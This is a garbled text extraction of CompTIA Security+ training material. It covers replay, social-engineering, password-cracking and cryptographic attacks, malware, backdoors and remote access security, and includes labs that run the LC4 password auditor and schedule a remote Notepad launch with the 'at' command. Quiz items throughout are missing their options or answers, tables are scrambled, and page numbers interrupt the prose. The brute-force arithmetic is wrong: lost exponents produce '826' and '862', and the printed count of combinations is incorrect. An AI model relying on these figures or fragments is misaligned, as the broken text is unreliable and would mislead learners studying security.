CompTIA Security+ Certification Countermeasures Secure authentication systems have an anti-replay feature that makes each packet unique. This ensures that even if authentication data is captured by an attacker, it cannot be retransmitted in order to gain access to systems. Web applications continue to be vulnerable to replay attacks. This is because assailants can gain access to user credentials via session IDs that are part of URLs stored in proxy server logs. To prevent this type of attack: Update software with the latest security patches For Web-based transactions, use SSL to encrypt sensitive data
Do it!
D-1:
Discussing replays
2 A Web application is vulnerable to a replay attack if a users _______________ are captured or intercepted by an attacker.
authentication tokens
327
328
Do it!
E-1:
Reviewing attacks
1 Attacker intercepts communications between two computers with intent of retransmitting capture data. 2 Attacker intercepts communications between two computers and acts as relay to access confidential data. 3 Attacker takes over the victims IP address by corrupting the ARP caches of directly connected machines. 4 Attacker consumes network bandwidth and computer resources to disable system. 5 Attacker sends very large ICMP packets that are too large for receivers buffer when reassembled. 6 Attacker creates an IP address with a forged source address. 7 Attacker intercepts a query to a DNS server and replies with bogus information. 8 Attacker uses hundreds or thousands of hosts on Internet to flood a victim with requests or deprive it of its resources. 9 Attacker hijacks TCP session to access network resources using identity of trusted host.
Replay
ARP poisoning
DoS
Ping of Death
IP address spoofing
DNS spoofing
DDoS
329
330
Dumpster diving
Digging useful information out of an organizations trash bin is another form of attack, one that makes use of the implicit trust that people have that once something is in the trash, its gone forever. Experience shows that this is a very bad assumption, as dumpster diving is an incredible source of information for those who need to penetrate an organization in order to learn its secrets. The following table lists the useful information that can be obtained from trash bins:
Item Internal phone directories Description Provide names and numbers of people to target and impersonatemany usernames are based on legal names. Provide information about people who are in positions of authority within the organization. Indicate how secure (or insecure) the company really is. Identify which employees are out of town at a particular time. Provide all sorts of useful information; for example, hard drives might be restored. Include the exact information that attackers might seek, including the IP addresses of key assets, network topologies, locations of firewalls and intrusion detection systems, operating systems, applications in use, and more.
Organizational charts
Online attacks
Online attacks use chat and e-mail venues to exploit trust relationships. Similar to the Trojan attacks, attackers might try to induce their victims to execute a piece of code by convincing them that they need it (You have an IRC virus, and you have to run this program to remove itotherwise youll be banned from this group) or that its interesting (a game, for example). Most users are more aware of hackers when they are online, and are careful about divulging information in chat sessions and e-mail. If a hacker can manage to get a small program installed on a users machine, he might be able to trick the user into reentering a username and password into a pop-up window. Social engineering countermeasures There are a number of steps that organizations can take to protect themselves against social-engineering attacks. At the heart of all of these countermeasures is a solid organizational policy that dictates expected behaviors and communicates security needs to every person in the company. 1 Take proper care of trash and other discarded items. For all types of sensitive information on paper, use a paper shredder or locked recycle box instead of a trash can. Ensure that all magnetic media is bulk erased before it is discarded. Keep trash dumpsters in secured areas so that no one has access to their contents.
Attacks and malicious code 2 Ensure that all system users have periodic training about network security.
331
Make employees aware of social engineering scams and how they work. Inform users about your organizations password policy (for example, never give your password out to anybody at all, by any means at all). Give recognition to people who have avoided making mistakes or caught real mistakes in a situation that might have been a social-engineering attack. Ensure people know what to do in the event they spot a social-engineering attack. Do it!
F-1:
Use a paper shredder or locked recycle box Teach employees to construct strong passwords Add a firewall Keep trash dumpsters in secured areas
B C
D
Make employees aware of social engineering scams and how they work Inform users about your organizations password policy Give recognition to people who have avoided making mistakes or caught real mistakes in
a situation that might have been a social-engineering attack
Ensure people know what to do in the event they spot a social-engineering attack
332
Encryption
Explanation Encryption is a method used to encode a plaintext file so only the intended recipient might read the original contents. This is usually accomplished using a complex algorithm and a key; the two are used to encode the original, readable version into an encrypted file and then decode the encrypted file back into its original form.
Weak keys
Weak keys are secret keys used in encryption that are easily cracked. Their vulnerability might be due to weak algorithms or keys that are too simple. For example, as computer processing capabilities increased, encryption keys have grown in size and complexity from 40 and 56 bits to 128 and even 256 bits. Hackers will continue to try to break encryption standards. The best practice is to use the strongest encryption standards and algorithms available, along with strong keys.
Mathematical attacks
A mathematical attack on a cryptographic algorithm uses the mathematical properties of the algorithm to decrypt data or discover its secret keys. This is done by using computations, which is a much faster method than guessing. The process of creating mathematical attacks on cryptographic systems is called cryptanalysis, which is traditionally broken into three categories, depending on the type of information available to the analyst. The categories are listed in order of increasing advantage to the analyst. Strong algorithms are expected to be able to withstand even chosen plaintext attacks. Cyphertext-only analysis The analyst has only the encrypted form of the data and no information about its cleartext (pre-encrypted) content. Known plaintext attack The analyst has available some number of messages in both unencrypted and encrypted form. Chosen plaintext attack The analyst has the ability to cause any message they wish to be encrypted.
333
Birthday attack
A birthday attack refers to a class of brute-force mathematical attacks that exploits the mathematical weaknesses of hash algorithms and one-way hash functions. It gets its name from the surprising fact that the probability that two or more people in a group of 23 share the same birthday is greater than fifty percent. You would need about 183 people in the same room to get a 50-50 chance a person shares the same birthday as you. The difference is that in the first case, two people share any of 365 possible birthdays. In the second case, youre looking for two people that share a single predefined birthday. This effect is called a birthday paradox. The birthday attack is one of the most significant attacks against the integrity of digital signature schemes. Heres the theory behind the birthday attack: Take some function (for example, a hash function) and supply it with a random input repeatedly. If the function returns one of k equally likely values, then by repeatedly evaluating the function for different inputs, statistically we expect to obtain the same output after about 1.2*k1/2 inputs. For the birthday paradox, replace k with 365. Birthday attacks are often used to find collisions (two inputs that result in the same hash value) of hash functions and are useful because they reveal mathematical weaknesses that can be used to compromise the hash. This is a much, much faster approach (compare 183 to 23 in the earlier birthday example) compared to the brute force technique of trying every possible combination.
Password guessing
Password guessing is another attack that seeks to circumvent normal authentication systems by guessing the victims password. This can actually be a trivial operation in some cases. For example, Microsoft Windows operating system stores username and password information in a SAM file located in the system directory. If attackers can gain access to the SAM file, they can immediately determine the user accounts (logon IDs) configured on the machine in question, and can then use brute force or dictionary password guessing tools on it to determine the users passwords. This can take some time if the user has selected a strong password, but can take substantially less time if the user has selected a common English word that can be determined by using a dictionary attack. One well-known commercial tool for assessing user passwords is called L0phtCrack after the hacker group named L0pht. (L0pht is now part of the security firm @stake.) This tool has a number of features, including the ability to conduct the brute force and dictionary attacks on Windows passwords outlined below.
334
CompTIA Security+ Certification Brute force The brute force approach to password guessing generates every possible combination of keystrokes that could be included in a password, and passes each possible combination one by one through the password hash function in order to crack the victims password. For example, a hacker attempting to crack a five-letter password of all uppercase letters might try AAAAA, BAAAA, CAAAA, and so on until the victims password is discovered. The brute force approach is effective compared to the dictionary attack, because it can crack any password, regardless of whether or not it is an English word that could be vulnerable to the dictionary attack. A brute force attack is computationally very intensive, and can therefore take some time to complete. For example, an 8-character password that uses only uppercase letters would require 826 or 302,231,454,903,657,293,676,544 possible combinations. If the password could use lowercase and numeric characters as well as uppercase ones, then the number of possible combinations jumps up to 8(26+26+10) or 862 combinations, which is a much higher number and would therefore take much longer to run through all possible combinations. Of course, the attackers could get lucky. If they stumble across the victims password early on, the time required to crack the password could be dramatically shorter, as would be the case if the victims password is BAAAA. Dictionary The dictionary approach to password cracking uses a predetermined list of words, typically normal English words and some variations, as input to the password hash. A dictionary password-cracking tool resolves the hash for each word in its list and then compares the hash against the users password hash, one by one. When the two match, then the password has been cracked. The dictionary attack only works against poorly chosen passwords. For this reason, its important that organizations put in place a policy that dictates users choose strong passwords that are not susceptible to this type of attack. Strong passwords are generally at least eight characters and use a mixture of uppercase, lowercase, numeric, and special characters. It is unlikely that an attackers word list includes this type of password, although poorly chosen passwords that meet the above criteria might still be in a hackers word list. The word p@55w0rd (password, spelled using the well-known hacker style) would be a bad choice for a password because it might be included in an attackers word list.
335
G-1:
Heres how
See the classroom setup instructions for location of the download file.
2 Install the program 3 Click Start and choose All Programs, LC4, LC4 4 Click Trial Click Next 5 In the Get Encrypted Passwords window, verify that Retrieve from the local machine is selected Click Next 6 In the Choose Auditing Method window, select Strong
Password Audit
(Follow the Instructors directions.) To open the LC4 Trial Version window.
LC4 has the capability of doing a brute force attack on passwords, which will find all passwords given enough time. The trial version, however, does not do the brute force attack, so it finds only the most vulnerable passwords.
Click Next 7 In the Pick Reporting Style window, select all options Click Next Click Finish 8 Close the LC4 program window
To begin auditing. LC4 will successfully decode the simpler passwords on your system.
336
Do it!
G-2:
2 The brute force approach to password guessing generates every possible combination of keystrokes that could be included in a password. True or false?
True
3 What type of attack will use properties of the cryptographic algorithm to discover its secret keys? A
B
C D
337
1.4
Vulnerabilities in software
Explanation The term exploit is often used to mean any type of attack on a computer system, but software exploitation in the true sense means a penetration of security through vulnerabilities in software. This term casts a wide net, but generally applies to all tools and tricks that take advantage of vulnerabilities in software, whether logic errors or buffer overflows. The majority of successful attacks which use software exploits take advantage of wellknown vulnerabilities, such as ones that are publicly known, and ones for which patches and fixes are readily available from their vendors, usually by download over the Internet. An excellent example of this is the wave of worms that exploited Microsofts IIS Server in the summer of 2001. Code Red, Nimda, and Code Red II used, and continue to successfully use, vulnerabilities that have received national press and for which fixes have been available for some time now. These worms have severely impacted the Internet by congesting links with attack traffic and crashing Internet routers, and the worms have severely impacted the businesses that have been hit by them. This points to a continued pattern of indifference to security issues on the part of system administrators, according to a study by Gartner Research in Might of 2002.
338
CompTIA Security+ Certification As software is tested by industry experts to assess its level of security and vulnerabilities are identified, the vendor is notified and given time to address the issue before the public is made aware. In this way, users of the product are given an opportunity to protect their systems with vendor-provided fixes and patches before attack tools are generated that can be operated by those with script kiddie-level skills.
Buffer overflows
Buffer overflows is a very common type of vulnerability and are frequently exploited on the Internet to gain access to systems. This type of attack works in the following manner. Whenever software accepts any type of data from a user or another application, it allocates memory for that data. If the data that is passed to the software is too large to fit into the allocated memory (the buffer), the data could overwrite areas of memory reserved for other processes, including the stack. What results is a buffer overflow, which can have a variety of consequences including application crashes, operating system crashes, or no effect at allor it could result in a situation in which the attacker can cause his own code to be executed on the system. In this case, the attackers buffer overflow could give the attacker access to the system. Countermeasures The key to stopping software exploits against your critical systems is to stay apprised of the latest security patches provided by your software vendors. Most vendors provide mailing lists for this purpose, so customers can be immediately aware of security issues associated with their products, as well as the fixes for those problems. Most security patches are readily available free of charge. Microsoft provides a number of free tools and services to Windows users in order for users of their products to stay abreast of the frequent security updates for their product. Perhaps the most accessible method, found at windowsupdate.microsoft.com, is an automated tool that can examine a Windows machine and identify the latest security and product updates needed for that particular machine. Other tools include the Microsoft Baseline Security Analyzer (MBSA) that identifies critical patches that have not been installed on Windows servers. For more information, go to www.microsoft.com/security.
Malicious software
Malicious software, or malware, is a catchall term for programs such as viruses, worms, Trojan horses, and backdoor programs that either have negative behaviors or are used by attackers to further their goals. The primary difference between the various types of malware is their means of spreading. The following table outlines the primary differences between worms, viruses, and Trojan horses; more precise explanations are given in each of the following sections:
339
Viruses
Viruses are self-replicating programs that spread by infecting other programs. Viruses copy themselves into other programs and change them (or their environments) so that, when the infected program is run, the virus is also executed and has the opportunity to spread the infection to other programs. The host program or executable can be any binary file, script, or code that has the opportunity to modify other programs. A virus can infect an executable binary, a Visual Basic script embedded in a text document or spreadsheet, or a script for IRC (Internet Relay Chat) clients such as Pirch or mIRC. Its important to remember that programs do not have to actually modify an executable itself to be categorized as viruses. Self-replicating programs that modify the behavior of the host program or its environment are also clearly viruses. For example, a virus might cause an e-mail client to mail a copy of the virus to every user in the clients address book without actually modifying the e-mail clients code. Types of viruses The number, variety, and frequency of new viruses are astounding. A visit to one of the many online virus databases reveals new viruses being discovered on a daily basis. The following table provides just a sampling of virus databases:
Product Network Associates (McAfee) Symantec Computer Associates Trend Micro URL http://vil.nai.com/VIL/default.asp http://securityresponse.symantec.com/avcenter/vinfodb.html www3.ca.com/virus/encyclopedia.asp www.antivirus.com/vinfo/virusencyclo/
340
CompTIA Security+ Certification The viruses can be categorized according to type. The following table lists the predominant virus types:
Type Boot sector Description Spread by infecting floppy or hard disk boot sectors; when an infected disk is booted, the virus is loaded into memory and attempts to infect the hard disk and all floppy disks inserted into the computer. A class called parasitic viruses because they must infect other programs; file infectors copy themselves into other programs. When an infected file is executed, the virus is loaded into memory and tries to infect other executables. File types commonly infected include: *.exe, *.drv, *.dll, *.bin, *.ovl, *.sys, *.com. Propagated by using both boot sector and file infector methods. Currently accounting for the vast majority of viruses, macro viruses are application specific as opposed to OS specific and propagate very rapidly via e-mail. Many macro viruses are Visual Basic scripts that exploit commonly used Microsoft applications such as Word, Excel, and Outlook. Instead of modifying an existing program, the companion virus uses the DOS 8.3 naming system to disguise itself as a program with the same name but different extension. For example, a virus might name itself solitaire.com to emulate the solitaire.exe program. The .com file executes before an .exe file of the same name. The virus then runs the real program so it appears as if everything is normal. Changes or mutates as it copies itself to other files or programs. The goal is to make it difficult to detect and remove the virus. Similar to polymorphic, but recompiles itself into a new form, so the code keeps changing from generation to generation.
File infector
Companion
Polymorphic Metamorphic
Propagation techniques Antivirus software and online scanning services have become more commonplace, so viruses must spread quickly if they are to spread at all. To accomplish this, viruses combine mass mailing techniques (sending copies of itself to all recipients in the infected hosts address book) with file infectors and worm techniques. Mass mailing techniques allow each instance of the virus to infect potentially hundreds of hosts. The following table outlines some of the methods that virus writers are using to spread their viruses:
341
Mass mailer targeting all recipients in the victims address book, in multiple activations. Mass mailer incorporating file infector, sharing network, and backdoor features. Mass mailer, also incorporating file infector, sharing network, backdoor process, and IIS infector methods. Spread through built-in SMTP client and local Windows network shares Spread through MSN Messenger
The major trend in viruses is that virus writers are adapting to more fully exploit the Internets functionality. Boot sector viruses, previously the most prevalent virus type, have been supplanted by worms and macro viruses that take advantage of the increasingly interconnected computing environments. Instead of slowly infecting machines as floppy disks are swapped and shared, viruses can now spread virulently enough to have a global impact in a matter of days or weeks via the Internet. Costs Viruses are incredibly damaging and costly. Some viruses carry a payload that is designed to erase files, format disks, or exhibit other undesired symptoms. Even viruses that do not have these qualities have extremely negative consequences. This is because viruses typically have consequences unintended by the virus writer. For obvious reasons, virus writers do not perform compatibility testing. When the virus spreads into systems with differing software packages or OS flavors, it can have unforeseen impacts which can range from slow system response times to causing the infected system to crash. When a virus becomes widespread, it causes very large productivity losses in businesses around the world as computer users struggle with their infected machines. Widespread infections can also result in what is effectively a denial-of-service (DoS) attack on mail servers, which can be brought to a grinding halt as they are swamped with a huge volume of virus-generated messages. Additional costs are incurred as system administrators have to spend time battling the infection and removing it from computers. Virus removal can often be a difficult and time-consuming process. The cleanup process itself can inadvertently cause additional damage to the computer system because administrators often have to replace important system files that are infected by the virus. Businesses can incur a significant cost in terms of goodwill and reputation if they are infected with a virus.
342
CompTIA Security+ Certification Countermeasures A number of vendors provide enterprise virus protection solutions that can effectively filter known viruses, Trojan horses, and worms. These solutions include desktop antivirus programs, virus filters for e-mail servers, and network appliances that detect and remove viruses. Best practices dictate that large organizations need a multi-layered security approach that defends against malware from all points of entry to the network. This means that no single solution is enough: virus solutions at network gateways, desktops, and on e-mail servers (both internally and on network Demilitarized Zones) are needed to best protect the enterprises productivity and information assets.
Item Description Install products from multiple vendors. Some suppliers offer a fix for a given new virus before others, so by using multiple products, your organization can have the fix for new viruses sooner. Keep virus signature databases up to date on both desktop computers and servers. Use automated systems to automatically download and install the latest signatures. Policies and procedures Software updates and patches User education Define an organizational policy that clearly states proper use of e-mail and network resources, and ensures that computer users receive training on safe computing habits. Keep machines, and especially servers, up to date with security patches to ensure their systems are not vulnerable to well-known exploits. Instruct users to never download any file from an unknown source. If a program is double-clicked even once, even for a moment to check it out, the computer can be infected. Caution users about executable files sent to them even from friends and co-workers. In general, there is little need to send executables via e-mail. Users should always check with the source before running the executable. Configure servers Many e-mail servers can automatically disable forwarding of dangerous file types by e-mail to prevent the spread of viruses and other malware.
Stress the importance of virus database update subscriptions so new software does not have to be purchased when an outbreak occurs.
Antivirus products
Trojan horses
According to legend, the ancient Greeks tricked the Trojans into admitting the Greek army by offering them a wooden statue of a horse as a gift. Once the Trojans had pulled the horse behind the citys fortifications, the Greek soldiers who were stowed away inside were able to gain access and conquer the city of Troy. Likewise, the makers of Trojan horse programs gain access to their victims computers by tricking them into running their malware by presenting the program as something useful or beneficial. The candy used to induce users to run the Trojan horse can include anything someone might find interesting: games, pictures, MP3s, screen savers, or pornography (one famous Trojan was entitled Naked Wife). When the unwitting user runs the program, it can wreak havoc with any number of methods including:
Attacks and malicious code Sending copies of itself to all recipients in the users address book Deleting or modifying files Installing backdoor/remote control programs
343
Most Trojan horses install themselves silently; users often dont realize theyve been infected until they receive an e-mail from someone saying an e-mail they have received from the user was infected with a Trojan. In the meantime, the attacker might have already collected password files or uploaded additional tools to use the victims computers for DDoS attacks. Propagation techniques Many viruses are categorized as Trojan horses because they use some sort of social engineering to induce the victim into running the attackers program. Most modern email clients do not allow programs contained in e-mail messages to execute automatically, viruses that spread by e-mail cannot multiply without user intervention. One feature of the Windows operating system that can be used to trick users into running Trojan horses is the Hide file extensions of known file types option. By default, Microsoft Windows hides file extensions, which can cause files to appear to be a different file type than they actually are. If file name extensions are hidden, then the file Reunion.jpg.exe will look like Reunion.jpg. This can trick users into executing Trojan horses. Countermeasures Implement a clear organizational policy regarding e-mail attachments and train users regarding the policy. Install antivirus programs on each client and maintain current signature files. Do it!
H-1:
A virus that recompiles itself into a new form from generation to generation. A virus that changes itself as it copies to other files or programs. A virus that spreads by infecting the hard boot sector or floppy disks. A virus that presents itself as a useful or beneficial program in order to trick the user into executing it.
C D
344
Backdoor
Explanation A backdoor is a piece of malicious software, or malware, that allows a malevolent user to gain remote access without the knowledge or permission of its owner. Also known as remote access Trojans, these programs allow an attacker to connect to the compromised computer locally or over the Internet and, depending on the type of backdoor installed, issue a wide variety of commands. Although some machines compromised with backdoor programs are used to store files and applications such as hacks and exploits for later use, they can also be used as handlers in a distributed denial-of-service attack. Trojan.VirtualRoot Backdoor programs can be installed on victim machines by any number of methods: Trojans or other social engineering methods, worms, viruses, or manually by exploiting vulnerabilities and uploading the remote control software. One recent threat using a backdoor is the Code Red II worm, which exploits vulnerability in Microsoft IIS servers to gain entry, install remote access software called Trojan.VirtualRoot, and continue to spread to other machines. This type of attack is typical of the recent trend of blended threats. Once the Trojan.VirtualRoot backdoor has been installed, the server might be controlled remotely. Back Orifice 2000 One of the more famous remote access control/backdoor programs is Back Orifice 2000 (BO2K), mockingly named after Microsofts Back Office 2000 product suite. Produced by a hacker group called Cult of the Dead Cow (www.cultdeadcow.com), BO2K is offered as a remote administration tool, although its lightweight and unobtrusive nature allow it to be surreptitiously installed on a victims computer without his or her knowledge. After the BO2K server (only 40K) is configured, as shown in Exhibit 3-8, and installed on the compromised system, it immediately buries itself into the Windows system directory and runs itself silently every time the computer is rebooted.
345
A remote attacker can then connect to the compromised machine by using the BO2K client GUI and issue any number of commands. Plug-ins are available for BO2K that allow the hacker to view the compromised computers desktop and move the mouse pointer. It is even possible for the remote attacker to activate the victims video camera and microphone, thereby monitoring everything, and everyone, in front of the computer. BO2K runs on most Windows systems and is currently being used on other operating systems. For more information about the tool, see the following Web site:
http://sourceforge.net/projects/bo2k/
NetBus NetBus is an earlier remote control/backdoor tool that has similar functionality to that of BO2K. Like other such programs, NetBus is often the payload of a Trojan horse or worm that gives hackers the ability to connect to the compromised machine over the Internet and issue a variety of commands. Some of the commands seem to be included in the feature set more for their ability to impress the unassuming victim than to be useful. A list of NetBus commands is shown in Exhibit 3-9.
Backdoor and remote access programs such as BO2K and NetBus are easily detected and eliminated by antivirus software and are otherwise thwarted by using the same mechanisms as used against Trojan horses and viruses. For this reason, it is important to implement an effective virus screening solution on all servers and desktop computers, as well as to educate computer users about the danger of e-mailed viruses and Trojan horses. In addition to these regimens, critical e-commerce servers should be equipped with host-based intrusion detection systems to block attacks that result in the installation of backdoors. Backdoor traffic can also be spotted by network-based intrusion detection systems, although some backdoors encrypt their traffic to bypass network IDS signature detection.
346
Do it!
H-2:
Heres how
For this activity, students will work in pairs. Each partnership will use two machines, Server-X and Server-Y. Instruct students to substitute their servers hostname for Server-X and their partners server hostname for Server-Y.
2 Press c + a + d Click Task Manager Activate the Processes tab 3 On Server-Y, log in as Administrator 4 Open a command prompt window 5 Enter the following command:
net time \\server-x To know the current time for Server-X so you can schedule the execution of a program. To open the Windows Task Manager. To view the current processes. Look for notepad.exe. You should not see it.
The value for <time> should be 3 minutes after the current time for Server-X.
at \\server-x <time> /interactive "notepad.exe" The command at \\server-x 3:49p /interactive notepad.exe, for example, will launch notepad within an interactive window at 3:49 PM on Server-X.
Attacks and malicious code 8 At Server-X , after the time specified in the command lapses, check Windows Task Manager and view the processes
347
9 Check the Server-X desktop for the Notepad application 10 Close Task Manager and Notepad on Server-X and the command window on Server-Y
348
Logic bombs
Explanation Another category of malicious code is known as a logic bomb. A logic bomb is a set of computer instructions that lie dormant until triggered by a specific event. That event can be almost anything, such as opening a document, launching a program, pressing a key a certain number of times, or an action that the computer has taken. Once the logic bomb is triggered, it performs a malicious task. Logic bombs might reside within stand-alone programs as Trojan horses or they might be part of a computer virus. This makes them almost impossible to detect until after they are triggered and the damage is done. Logic bombs are often the work of former employees. One logic bomb caused a companys computerized accounting system to be corrupted. It was triggered by an instruction to check the corporate salary database every three months; if the programmers name was not found, the logic bomb was instructed to launch. Another logic bomb was the work of an independent computer consultant hired to write a program. His intention was to return after the logic bomb was triggered and be paid a large consulting fee to fix the problem. On personal computers, a prominent type of logic bomb is known as a macro virus. A macro virus uses the auto-execution feature of the specific application programs, such as Microsoft Word. Whenever Word is launched, the virus is triggered and performs a malicious act.
Worms
Starting in mid-2001, worms surpassed DoS attacks as the primary type of malicious activity on the Internet. The release of the Code Red worm in the summer of 2001, which was shortly followed by Code Red II and Nimda, brought about a sea of change in the type of attacks that security administrators need to fend off. Although the term worm has a few different commonly used meanings, the classic worm or real worm is defined as a self-contained program that uses security flaws such as buffer overflows to remotely compromise a victim and replicates itself to that system. Unlike viruses, true worms do not infect other executable programs, but instead install themselves on the victim computer system as a stand-alone entity that does not require the execution of an infected application. Melissa The term e-mail worm has also been informally used to mean a virus that spreads through external network connections, emphasizing the threat posed by mass mailing viruses. The Word97Macro/Melissa worm was perhaps the first well-known e-mail worm and most famous virus to date. Melissa gained notoriety in March of 1999 as the first virus to send mass e-mails of itself by using recipients in a users address book. Code Red Although e-mail worms have become a common and very prevalent threat to networks, true worms such as Code Red have become even more common, accounting for 80% of all malicious activity on the Internet and bringing e-commerce networks to a standstill. Appearing in June of 2001, Code Red exploited a known vulnerability in Microsoft IIS 4.0 and 5.0. The worm operated by creating a random list of IP addresses, which it then scanned for the IIS vulnerability. If the worm found a target system with the vulnerability, it executed the buffer overflow exploit, which resulted in the worms code being loaded onto and executed by the victim system.
349
The worm then began to propagate itself from the newly compromised machine. After two hours, the worm changed the servers Web page. The Code Red worm also tried to perform a denial-of-service attack on the IP address of www.whitehouse.gov, but the threat was averted by simply changing the domains IP address. Since Code Red did not store itself on any files, the worm could be removed from infected systems simply by rebooting the machine; however, servers would remain vulnerable to the attack and could be reinfected with Code Red until system administrators applied the necessary security patch provided by Microsoft. Although Code Red was programmed to go dormant shortly after its release, its successor worms, Code Red II and Nimda, continued to be a real threat to unpatched IIS servers over a year after their release. Countermeasures The method of true worms is to exploit known vulnerabilities in order to spread themselves; the key defense against these attacks is for system administrators to ensure all servers are patched with the latest security updates. Since Nimda can exploit a vulnerability in Internet Explorer to run an executable in a Web page or e-mail message without user intervention, system administrators must keep abreast of security issues affecting their users desktop computers and ensure the required security patches are installed. Network and host based intrusion detection systems (IDS) are also critical components needed to secure a network against remote attacks such as Code Red. Host-based IDS can detect unauthorized system activity and stop it before the server is infected. Network-based IDS can detect the signatures of known worms as well as the malicious activity generated by those worms and can notify system administrators as well as instruct routers and firewalls to block traffic from the offending hosts. To protect against worm attacks that are propagated via e-mail, a comprehensive antivirus system should be implemented. Make sure users have their e-mail set so it does not preview a message when selected. Instead, users should have to double-click the message and only then if they recognize the sender.
350
Do it!
H-3:
351
Topic B
Topic C
Topic D
Topic E
Topic F
Topic G
Topic H
Review questions
1 Distributed denial-of-service attacks can involve which of the following? (Choose all that apply.)
A
Zombies
B Birthday attack
C
Handlers
D TFN2K
352
CompTIA Security+ Certification 2 Which of the following correctly outlines the normal setup of a TCP session? A ACK, SYN, SYN/ACK B SYN, ACK, RST
C
D ACK, RST, SYN/ACK 3 Identify each of the following as a DoS tool, backdoor, virus, or Trojan horse:
Item CodeRedII Trin00 BO2K Stacheldracht Melissa Type Virus Tool Backdoor Tool Virus
4 ARP poisoning affects which of the following? (Choose all that apply.) A Hostname-to-IP address resolutions
B
C Domain name resolution D Authentication requests 5 Man-in-the-middle attacks can be accomplished using which of the following?
A
ICMP redirects
B NetBus C ARP spoofing D Replay attacks 6 Denial-of-service (DoS) attacks is a family of attack methods that make target systems unavailable to their legitimate users. True or false?
True
7 The SYN flood attack exploits the nature of the TCP three-way ______________.
Handshake
9 Pings are used to establish whether a remote host is reachable. True or false?
True
353
10 A well-known exploit that uses IP Packet fragmentation techniques to crash remote systems is called: A Spoofing B Smurf
C
Ping of Death
D ARP poisoning 11 Smurf is a non-OS specific attack that uses the network to amplify its effect on the victim. True or false?
True
13 To prevent an internal Smurf attack, you should turn off directed broadcasts on all internal routers. True or false?
True
14 Hunt is a free Linux tool that can monitor traffic on an Ethernet segment. True or false?
True
17 A _________________ __________________ is a program that poses as something else, causing the user to willingly inflict the attack on himself or herself.
Trojan horse
354
41
protocols.
D Identify the different vulnerabilities
42
Communications mediums
The communication medium describes the physical connection between the remote computer and your network. These include: Dial-up connections Integrated Services Digital Networks (ISDN) Digital Subscriber Lines (DSL) Cable modems Dial-up connections Public Switched Telephone Network (PSTN) connections (also called dial-up connections) use analog modems and standard telephone lines to transmit data. They rely on Serial Line Internet Protocol (SLIP) and Point-to-Point Protocol (PPP) to dial up and connect to a remote access server. (PPP is a data link protocol that provides dialup access over serial lines. It provides password protection and authentication using the PAP or the stronger CHAP protocols. SLIP is an older data link protocol and has been largely replaced by PPP.) PSTN connections are the cheapest means of data communications, although lack of a local ISP can run up some expensive long-distance bills. Speeds range up to 56 Kbps. From a security standpoint, telephone lines are difficult to sniff, but are susceptible to war dialing. This is an attack where the perpetrator dials all telephone numbers within a specific neighborhood, records those that have modem connections then redials into the system in an attempt to break into the computer. ISDN Integrated Services Digital Network (ISDN) is a telecommunications standard for transmitting voice, video, and data over digital lines. Like PSTN, it relies on SLIP and PPP to communicate. ISDN basic service (BRI) uses two 64 Kbps circuit-switched channels, called B channels, or bearer channels, which can be combined to create higher bandwidth, to carry voice and data. It provides a separate 16 Kbps D channel, or delta, channel for control signals.
Remote access
43
The D channel is used to signal the telephone company computer to make calls, put them on hold, and activate features such as conference calling and call forwarding. It also receives information about incoming calls, such as the identity of the caller. ISDN also offers two high-end services: Primary Rate Interface (PRI) is geared for business customers. The North American and Japanese implementation provides 23 64-Kbps B channels and one 64 Kbps D channel for control signals. The European implementation provides 30 B channels and one D channel. Broadband ISDN (B-ISDN) is geared for enterprise customers. It uses cell switching with rates above 155 Mbps to transport data, voice, and video on a single circuit. ISDN is noticeably faster than analog modems but significantly slower than DSL connections. Unlike DSL, it can be installed in almost any location. DSL Digital Subscriber Line (DSL) sends digital transmissions over ordinary copper telephone lines for high-speed Internet access. DSL technology is available in several forms, collectively referred to as xDSL. Transmission speeds range between 384 Kbps for Internet uploads and 1.54 Mbps for downloads. DSL must be installed within a 5.5 km (18,000 ft.) radius of the phone companys access point. The faster the connection, the closer the subscriber must be to the access point. DSL is more expensive than analog connectivity options. One security issue concerning DSL is that the network connection is always on until the system is switched off or unplugged from the network. This leaves the system vulnerable to hackers. Cable modem A cable modem is an external device that allows your computer to connect to the Internet through a cable TV wire. The cable runs from your neighborhood to a central location, referred to as the headend. Additional equipment is installed there that communicates to all the cable modems in subscribers homes. Cable modems translate radio frequency (RF) signals to and from the cable plant into Internet Protocol (IP). For those who can get it in their area, cable modem service has quickly become a popular high-speed alternative due to competitive costs and very high speeds; however, there are some drawbacks. Since this is a shared server, bandwidth diminishes as more local users simultaneously access the Internet. In addition, as the connection to the Internet is always open, the system is vulnerable to attacks by hackers.
44
Do it!
A-1:
C D
PAP and CHAP PSTN and SLIP SLIP and PAP DSL and ISDN
B C D
Remote access
45
Topic B: Authentication
This topic covers the following CompTIA Security+exam objective:
# 2.1 Objective Recognize and understand the administration of the following types of remote access technologies 802.1x TACACS (Terminal Access Controller Access Control System) Radius
Security protocols
Explanation When a corporation adds remote users to their corporate network, it faces a new range of security issues: the users are communicating over an open line, or using remote access applications over the Internet. This enables an unauthorized user to snoop or launch replay and man-in-the-middle attacks against the network. Authenticating remote users requires additional security measures to ensure data is protected over an unsecured communication medium. First, usernames and passwords must be encrypted. Second, corporate policies, including access control lists, must be maintained. Finally, all communications must be monitored and logged for auditing purposes. The following security protocols provide solutions to these issues: IEEE 802.1X Remote Authentication Dial-In User Service (RADIUS) Terminal Access Controller Access Control System (TACACS+)
IEEE 802.1X
Our discussion of the IEEE 802.1X protocol begins with PPP. PPP is a protocol for communication between two computers using a serial interface, typically a personal computer connected by phone line to a server. Once the connection is established, PPP can negotiate an authentication protocol to authenticate the user. The traditional authentication method has been either PAP or CHAP, although PAP is not considered secure. Extensible Authentication Protocol (EAP) extended the capabilities of PPP to encompass a range of new authentication methods, including token cards, one-time passwords, certificates, and biometrics. It describes standards to ensure compatibility and interoperability between the remote user, an access point or switch, and an authentication server, such as RADIUS. EAP deals exclusively with the authentication process. IEEE 802.1X provides a standard for authenticating and controlling user traffic to a protected network. It does not provide the actual authentication mechanism, but instead uses the EAP protocol to define how authentication takes place.
46
